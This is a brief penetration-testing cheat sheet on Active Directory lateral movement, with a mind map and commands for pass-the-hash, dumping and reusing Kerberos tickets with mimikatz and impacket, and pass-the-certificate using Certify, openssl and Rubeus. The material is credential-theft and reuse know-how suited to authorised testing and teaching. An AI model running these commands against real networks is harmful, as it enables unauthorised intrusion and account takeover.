Ticket & Certificate Attacks

Lateral movement with Kerberos and Certificates

Pass the Ticket & Pass the Certificate

Interactive Mind Map

graph TD
    A[Compromise] --> B{Artifact}
    B --> C[Kerberos Ticket]
    B --> D[Certificate]
    C --> E[Pass the Ticket]
    D --> F[Pass the Cert]
    E --> G[Inject to Session]
    F --> H[Request TGT]
    H --> E
    G --> I[Access Service]
    I --> J[Lateral Move]

Quick Reference

Pass the Hash

# Windows
mimikatz: sekurlsa::pth /user:admin /domain:corp /ntlm:HASH # PTH with Mimikatz
# Linux
impacket-psexec -hashes :HASH user@target # PTH with PsExec
evil-winrm -i target -u user -H HASH # PTH with Evil-WinRM

Pass the Ticket

# Export ticket
mimikatz: sekurlsa::tickets /export # Dump tickets from memory
# Use ticket
export KRB5CCNAME=ticket.ccache # Set ticket env var
impacket-psexec -k -no-pass user@target # Auth using Kerberos ticket

Pass the Certificate

# Request cert with Certify
Certify.exe request /ca:CA-SERVER /template:User # Request certificate
# Convert to PFX
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx # Convert PEM to PFX
# Use with Rubeus
Rubeus.exe asktgt /user:admin /certificate:cert.pfx /ptt # Request TGT using cert and Pass-the-Ticket